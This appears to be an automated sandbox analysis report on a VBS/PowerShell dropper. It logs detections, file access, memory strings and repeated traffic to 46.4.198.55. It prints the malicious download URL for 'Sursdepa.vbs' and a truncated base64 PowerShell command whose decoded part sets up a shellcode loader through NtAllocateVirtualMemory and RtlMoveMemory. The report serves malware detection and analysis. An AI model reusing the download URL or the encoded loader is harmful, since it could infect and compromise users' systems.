Source: http://46.4.198.55 |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbsh |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbs |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~ |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$ |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbs0yj |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.v |
Avira URL Cloud: Label: malware |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Jump to behavior |
Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData |
Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q1 |
Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete |
Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX |
Source: global traffic |
HTTP traffic detected: GET /10P/Sursdepa.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 46.4.198.55Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55 |
Source: powershell.exe, 00000003.00000002.292149897.00000167E848D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.v |
Source: powershell.exe, 00000003.00000002.295924482.00000167E855C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282654233.00000167E5B98000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs |
Source: powershell.exe, 00000003.00000002.282555129.00000167E5B10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs |
Source: powershell.exe, 00000003.00000002.301030775.00000167FFDE7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281332697.00000167FFDE2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$ |
Source: powershell.exe, 00000003.00000002.282784282.00000167E5E50000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~ |
Source: powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs0yj |
Source: powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbsh |
Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55x |
Source: powershell.exe, 00000001.00000002.335374156.00000211CEF07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.300317707.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281232280.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.528421591.0000000002D8B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000001.00000002.323271463.00000211B7732000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://go.micros |
Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000001.00000002.318892077.00000211B6EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282944131.00000167E7731000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.298249127.00000167E8C5F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.300436047.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281286699.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://go.microsoft.co |
Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: global traffic |
HTTP traffic detected: GET /10P/Sursdepa.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 46.4.198.55Connection: Keep-Alive |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABz |